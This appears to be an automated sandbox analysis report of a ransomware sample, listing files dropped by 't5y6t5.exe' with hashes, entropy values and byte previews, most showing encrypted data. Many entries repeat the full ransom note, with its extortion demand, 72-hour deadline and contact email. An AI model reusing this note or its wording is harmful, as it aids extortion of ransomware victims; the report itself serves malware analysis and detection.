                                                                                            Preview:....Z...Z2...[..p...G..R../....#T......<.."..s..7..+{..O:U..v.g...v".3[.....(wT..b...juH.Nw.twitter.com/.......EZ..t..r_....j..l..A.A=...z...}...g\....3.;@-.....%...G.Th7K..`.."s.....W.G....h....^..jdbiA......q.x....W..f.....t.Z?J..M.j....b..._L.hus.9.@#e........G_....F..Goe./e?.^...!.(bYw.........j.t......iI ......3..I..DJ.`r3......C..*..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):380
                                                                                            Entropy (8bit):7.425225371637327
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:eo0MGDjVshMfB+9Wiu0okUwCKNK0WWjyCzR1fbBfs1hzXz7GiFrJVTJ3FHeZ8w7Z:N0LDjuhBu0okr1NHRjywLbpOhzXz71jM
                                                                                            MD5:5B59E400A52481AD01C221A54A01EF2A
                                                                                            SHA1:BAC94E39C3C76D1AF3D19FF2726F71079866D50C
                                                                                            SHA-256:72D9B2CAE26E53C696AF00E0E78A987969D2628B6750588B56B07F4D44E06249
                                                                                            SHA-512:9FC4C318D11E10C668E78CF54AE833EDAA7B2FA1DE368AED58A8811401922E30F5C985CBF28E5BBD0B11D25B0DB8AC1D9D7662A131A3383774F85011617DF379
                                                                                            Malicious:false
                                                                                            Preview:.....F..v....!9<.O............(yjG..}/p.(.F.....Y.H/...}.w.iJ.p..\.....rDG(&!...E.v..m_......a.$/.)[Wyw3.....(!k8.Q@.'R....4...3'....{Er..;..}.e...L.!.....E.j.G.......q'&..Gx..U....{6D5..*.>H..V.Wm..$...Zt!gF.....~....a6...'.Ik..U.Q.Ow.H1...[O....r...b............R...d.....R...Tc8..X......m......._.....i."lv\....N...K. z....'.?}s..............0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.448432224759763
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:AAXLptMKoAqM1ddZZ0nG/v9RYx68ncgL2nlN8f81atd28LYJ+gTIAJ2WZDgImO9O:vLptJqyMnG/lRYxDcJlypfYcc5uxLXCe
                                                                                            MD5:0F784FDF2C0C03CF6821C87B5B81E763
                                                                                            SHA1:37D5E202596692FA97D95F6A8E528D5798EEAA6E
                                                                                            SHA-256:E027A4180DA32935E4DC3EFE5835F0EE78CED99DFD3BA3AD90F3C1474BF8C8B0
                                                                                            SHA-512:F4D6A17720CEF3B13E307BC6179B154C3A1C5FB45144940C25FFAD26CF21EC7529BEBC156495014AB849A0203EA8BA568E1F601C17E4302685B992E631DAC3F0
                                                                                            Malicious:false
                                                                                            Preview:.Z&..b.a..reipi....r...GkK....f.p.n{$.$:./.......41.F^K...^...e..f..J.w..."t...W&.>..EJw.youtube.com/......\.;9Dt..k8.$..[,.....Ul..|.Ve.6.Lg..x..........q..i.....:.#].....&.u..u.K..y..K./....9.Eyl..".......Y.c ...K.iL...d.4.y.Y...e.7I.r.6#bc...b...x.....gu.W&..........V.R]I./O..]}....U..F.P../.l2\.*%.}i..._..2anw3..........n..H....%....l).z..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.189428935530747
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:yYrg+Q8u97N05X9WAAMPKM2c1cy7FK2Pms/Oxn:lzQ8cqUFMPasPPms/Oxn
                                                                                            MD5:D5AB72CE25F006BEE8CAAAF158F17156
                                                                                            SHA1:9C7F927127B45D156FF7AE92B489DAF0CF2149CD
                                                                                            SHA-256:672C2AA1CD077EBE8C7F76BA66C758B78A020B1A7F12306CE1E7782217B995CC
                                                                                            SHA-512:4E5F420C22E42F17BC00851589C6208A89BC31057972E81970004C6CA331D88E66B8ED2474919A3D80F59F13CD6B1616FEC0495AB58F38CC7BC6FAA95F8A8A71
                                                                                            Malicious:false
                                                                                            Preview:9...j.6B.r.&......,A@..ta.......(..~'.u...../.k.......`K.'e.....[ .2u........Q.y.......p....#{..t......)v.._/[..*./.}..u.f....Xn .5.A3 ....}.|.]};...k..&.YYC.ghH..y&.. ...#d...L..j..0.....GJ..O&.^..j..Z..E.H.R8....f_..&}...C..~. ..L.9......NH..4.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.257620535107503
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:4tkLl6mMaI4KdpqZhR4ZJMi2WVOyFrjateB0FMgPuoVqv1nZn:42LlFRGpyQKWVOyJ6eCKJ11nZn
                                                                                            MD5:A78638249AE90233261DEF2399A2263F
                                                                                            SHA1:17CD3EC08A2330A3338500FFDE765E8C3D60C00C
                                                                                            SHA-256:B4955B46953DE1E013AD0570E3356FB2D297651B7BB486D9F760267A6CC67783
                                                                                            SHA-512:DFFDEEC4C4076D0B44CE2CDAF78B0632C9E3051E972AC64AF0ED59671DAE08C547B4345C6133326580DEFE722210F39EB52EEFF7BD5B3A0AE8A9999717BF7278
                                                                                            Malicious:false
                                                                                            Preview:...s.9..Yp...Ky.C...n."E...&..E..%.....`s.7lUH..J^..OR....n.;E.g.CK..'v/..<...]......JNk.d.t..$..r...Dfb{.b.. .o....C.Q....%g....(:..T...&A._.I....w=I...R+.i.Q.....L..=..V....:...[..eVB...{...?......".....M5......>n..8......&.?r.|.v..s..i.j.^0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.313612463639769
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ZcJi0uystaJl/Vs7bU2QjDgZiLmoHUk0v3mn:J0u/JvUljM4J0Nmn
                                                                                            MD5:6BE2C5776A3FFE39E149E90647907118
                                                                                            SHA1:6C7AA021D4EF3D7EE9BE012863FFE29BABF93BAA
                                                                                            SHA-256:5A633D5A89560D24E45BD9F7883B500479CFA4EE964D575A3E60487998E0E201
                                                                                            SHA-512:8532090B7CD992C98B178950B5852187D69CB8A640484D0B2BAE09793613A6FEC1D56693AE54437E934CB9D5B9B8145F29BE21A2CF99661848EB4C2A415D04AA
                                                                                            Malicious:false
                                                                                            Preview:=.9..%h..}.m..k.n`.U.....L.Qg...2..f>|w...!...[..d...]...Jm.2p..U6.Z.BD..<....SU..*....37nF...RY..W.1.F...P.....F}.D&...."m..:....C\......_._\.B..l.,z.q3........T...@...xeD....t..?r.V|.]Yq..jZQlP.a.....u...$mq.`..T..... c.....gk...K8...$=....i.q0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.217808164935387
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:B/iV0C4t5KOu/f7xglXge3bO92ZTYZOQnmn:Jk/4LKOu3elXgCbNnDn
                                                                                            MD5:2B203AB2EC95BE56E9B34345A8B17D98
                                                                                            SHA1:8E7F753E2BE9E301D4FF905341D9A6BF9C34E4CC
                                                                                            SHA-256:094BF5AAC86CE743E2C01C45B294166D2EFF489CED3F9C62DBA2B8065754E353
                                                                                            SHA-512:CC76F992AF75A241BDF5FE355834EB6DB29D3963D4E621010DC1E3BFBA2F515430B9AD88EE0A48B47A25E69812541BA02BD862BA3E09D137BD9511DBA8A0AECE
                                                                                            Malicious:false
                                                                                            Preview:".IhLK..wJ.e...!:..5O.)...l.@W].5....#.=......A..,......m..|V...y.}.....,..p\.-{...H...H...L..j....1$X..d.L.....Z.fR..x..1u....e&3..'..v.p...Q.+..P.l.'i....|.....r.T2......~.j.oK_..-...9K.Drz#..-.@..N.eB.#....C2.Jok.}.u...Q.K...t.o....eG.....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:COM executable for DOS
                                                                                            Category:dropped
                                                                                            Size (bytes):1125
                                                                                            Entropy (8bit):7.8297443770615205
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:J7H2buN9eTeIAwVPRkBOLh6c5sua+dnF6sFcNYtuvm1kZ:9H2buCKIPpGy6c28AK8vmG
                                                                                            MD5:DD3FCD61C1B9AA8B30BBCF4DA1367251
                                                                                            SHA1:31B30DE369E0915E000E634DAFD53FD572541866
                                                                                            SHA-256:9DE94BC8AC731DA355ED9A915FA39ADE4BD430DD10B24BEFD48E319CD73E1F80
                                                                                            SHA-512:817CBB865F7C532A7C866BB3AB80DC5621A73FEFD79407CE7CBCE5B50B683E0BEF294CAE4AE5DC4DE95E69BBADF5579232342510D76F939ADA6FEDCAB74359C7
                                                                                            Malicious:false
                                                                                            Preview:.V .i.Z+..!.d.F:.p.:.8D..X`!H...Rn....0...6..wUn'$b.........>20.j.>N..o...~ ...Y..r}b..A4...|.Z.^,/..[.P........rN.....cX.7g.....H.:6.............ZW.4....!).>k|D>..s;............;.........|.E@....g...S.v......-..=..k4P5U..g..r...B.9@dx>5j..H.Y.z...rQ[()zCy..v._...7J{...Z..Hl....F.'...%/J..[.m.........x...g,......n#`.4.k6..HN.9.Ay..q.b).yW......\...x5.r*z.L..Y.....+8........Q..}}....;........H..H.......&...J`.S1.w=...g..pQ...........z..]...../%.$.P....L...,......p3".3..J.k..d.xr`....X.+...m....],-.7.'c....0.........?z../..Z.p.j.)0...!_..N/.\.HG.N. #H.1'r.......Osk..#.X..2!.+..x.'/.6+..,..;. .Tw*.Z..1?....dR.-......j..X...:...%6......fM.0/....r.p...|C.F.R..a../.[...0A..v..SBp...Y..~Ru.C.C.E<|.r....y>]....R.....}(L>Wz.lVf.$..........D..{....V.?..w...Hn.........Nzst.@..U..a.'..~.\....`Y.(.u...E..Ybescription>.......Wy.?..^Z.l4..y..D.6.'7..B.....X.w....Sx8..oY5../.......g...W..y........r.^...."...9...........8..U.;...o..q.o...*.2.As.S..].2.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.224322259336954
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:cedL3Vd/phhbX0qd9EhqvI+YYN9t0DzbrFMNHw2HGQaVDtn:hdLzJkqjQ7YdMbrwwZQeZn
                                                                                            MD5:077279615D717BC6F95ABFCC2B551DEE
                                                                                            SHA1:BF0970A6B9E165E413F43A7D5DAE8128B25E3FBE
                                                                                            SHA-256:10C291882DEDB04DFE9DA6DCBE0CDED276B0C2592F62383E6E06EAB814AD407A
                                                                                            SHA-512:846BEF3EFB08E9F3FC61E529D47FD2710FD7DB69F2A49D64F82E466E8DA105FF7940CB474227FAD07F659D12551A2C5E692D5D45CB52FC290DE2AF2A08830F75
                                                                                            Malicious:false
                                                                                            Preview:..3U.=.......a.L............^\...p?]vh....nc...&w...&.L.iy.>..@.'.....x..\....-C.R....^2 ....C.....l.. ...(.c!...;..y"?...:sPe....Y@.s.-..N......Q.1..c.....l./.gSt.f]GeL..S.D.Bsi?'.....U<.s.,..W.9.6P,......(.ZD...HGc...{&._...K...R...e..cN.."...$..UD....T2.>..$..;^....M.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.238374612255011
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:6dTH/j6rTEIrRT/7VqLrSl3cO/heOJV7+x3cpNeagmf1iRVnsyRSFlnzZUHn:6RfOrpVALecO/hXVO3cpNLiRNhRSPzqH
                                                                                            MD5:38803137A8B7E073FB91D9A97BAEAE82
                                                                                            SHA1:E44C1B9140E87B07DAEDBAA14D56FBD2EB47F664
                                                                                            SHA-256:35A365DEA3F048E60D2C57786BA919CDA4E79916DF4D19C06DB02541C853CC11
                                                                                            SHA-512:94466A06AFCFD366F4578867B6B639C9C1F47E95C92FA6204544A2656DB049C13302D26EA3A5FC2A872927961D2020B254EC3772495A73FBAC9D6B3F99D04D4E
